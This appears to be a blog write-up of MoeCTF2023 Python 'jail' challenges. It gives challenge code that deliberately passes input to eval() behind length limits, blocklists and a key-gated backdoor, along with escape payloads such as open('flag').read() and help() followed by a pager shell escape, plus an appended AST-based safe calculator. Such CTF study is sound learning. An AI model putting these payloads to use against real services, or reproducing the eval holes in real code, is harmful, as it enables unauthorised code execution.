```python
print("Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.")
print("Enter your expression and I will evaluate it for you.")
user_input_data = input("> ")
# No filtering at all: the input goes straight into eval().
print('calc Answer: {}'.format(eval(user_input_data)))
```
Level 0 only checks that your nc connection works; no filtering is applied.
My answer:
```python
open('flag').read()
```
Jail Level 1
```python
print("Welcome to the MoeCTF2023 Jail challenge level1.It's time to work on this calc challenge.")
print("Enter your expression and I will evaluate it for you.")
user_input_data = input("> ")
# The only restriction is a 12-character length limit.
if len(user_input_data) > 12:
    print("Oh hacker! Bye~")
    exit(0)
print('calc Answer: {}'.format(eval(user_input_data)))
```
Jail Level 2
```python
print("Welcome to the MoeCTF2023 Jail challenge level1.It's time to work on this calc challenge.")
print("Enter your expression and I will evaluate it for you.")
user_input_data = input("> ")
# The length limit drops to 6 characters.
if len(user_input_data) > 6:
    print("Oh hacker! Bye~")
    exit(0)
print('calc Answer: {}'.format(eval(user_input_data)))
```
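The payload length is restricted further here, so breakpoint() clearly can no longer be used either.
Here I use help() and then look up sys.
Because the output is too long, the interpreter pages it with more; at that point, enter
```
!/bin/sh
```
or directly
```
!cat flag
```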
Jail Level 3
```python
import re

BANLIST = ['breakpoint']
BANLIST_WORDS = '|'.join(f'({WORD})' for WORD in BANLIST)

print("Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.")
print("Enter your expression and I will evaluate it for you.")
user_input_data = input("> ")
# 12-character length limit plus a case-insensitive word blocklist.
if len(user_input_data) > 12:
    print("Oh hacker! Bye~")
    exit(0)
if re.findall(BANLIST_WORDS, user_input_data, re.I):
    raise Exception('Blacklisted word detected! you are hacker!')
print('Answer result: {}'.format(eval(user_input_data)))
```
```python
fake_key_into_local_but_valid_key_into_remote = "moectfisbestctfhopeyoulikethat"
print("Hey Guys,Welcome to the moeleak challenge.Have fun!.")
print("| Options: | [V]uln | [B]ackdoor")


def func_filter(s):
    # Reject any input containing one of these characters.
    not_allowed = set('dbtaaaaaaaaa!')
    return any(c in not_allowed for c in s)


while(1):
    challenge_choice = input(">>> ").lower().strip()
    if challenge_choice == 'v':
        print("you need to ")
        code = input("code >> ")
        if(len(code)>6):
            print("you're hacker!")
            exit(0)
        if func_filter(code):
            print("Oh hacker! byte~")
            exit(0)
        if not code.isascii():
            print("please use ascii only thanks!")
            exit(0)
        print(eval(code))
    elif challenge_choice == 'b':
        print("Please enter the admin key")
        key = input("key >> ")
        # Compare against the module-level key defined at the top of the file.
        if(key == fake_key_into_local_but_valid_key_into_remote):
            print("Hey Admin,please input your code:")
            code = input("backdoor> ")
            print(eval(code))
    else:
        print("You should select valid choice!")
```
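This restricts things further: the input may not contain any character from "dbtaaaaaaaaa!" and may not be longer than 6 characters.
Here I use help() and then look up __main__, which also displays the value of the key variable.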
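Every level above hands user input to eval() and tries to contain it with a length limit or a blocklist. As an added example (not part of the original challenges or this write-up), the calculator below parses the input and evaluates only allowlisted arithmetic nodes, so the payloads used above are rejected; the names safe_calc, is_rejected and MAX_LEN are hypothetical.

```python
import ast
import operator

# Allowlist: only these operators are ever evaluated (no ** to avoid huge results).
_BIN_OPS = {
    ast.Add: operator.add, ast.Sub: operator.sub,
    ast.Mult: operator.mul, ast.Div: operator.truediv,
    ast.FloorDiv: operator.floordiv, ast.Mod: operator.mod,
}
_UNARY_OPS = {ast.UAdd: operator.pos, ast.USub: operator.neg}
MAX_LEN = 64  # constructed limit; bounds work done, it is not the defence itself


def _eval(node):
    """Evaluate an AST node, refusing anything that is not plain arithmetic."""
    if isinstance(node, ast.Expression):
        return _eval(node.body)
    if isinstance(node, ast.Constant) and type(node.value) in (int, float):
        return node.value
    if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
        return _BIN_OPS[type(node.op)](_eval(node.left), _eval(node.right))
    if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY_OPS:
        return _UNARY_OPS[type(node.op)](_eval(node.operand))
    # Calls such as help(), open() or breakpoint(), names and attributes end up here.
    raise ValueError(f"disallowed expression element: {type(node).__name__}")


def safe_calc(expr: str):
    """Hardened replacement for eval(user_input_data) in a calculator service."""
    if len(expr) > MAX_LEN:
        raise ValueError("expression too long")
    try:
        return _eval(ast.parse(expr, mode="eval"))
    except SyntaxError as exc:
        raise ValueError("not a valid expression") from exc
    except ZeroDivisionError as exc:
        raise ValueError("division by zero") from exc


def is_rejected(expr: str) -> bool:
    """Return True if safe_calc refuses the input."""
    try:
        safe_calc(expr)
    except ValueError:
        return True
    return False
```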
ZackMount
This piece of writing is an original article, utilizing the CC BY-NC-SA 4.0 Agreement. For complete reproduction, please acknowledge the source as Courtesy of ZackMount's Blog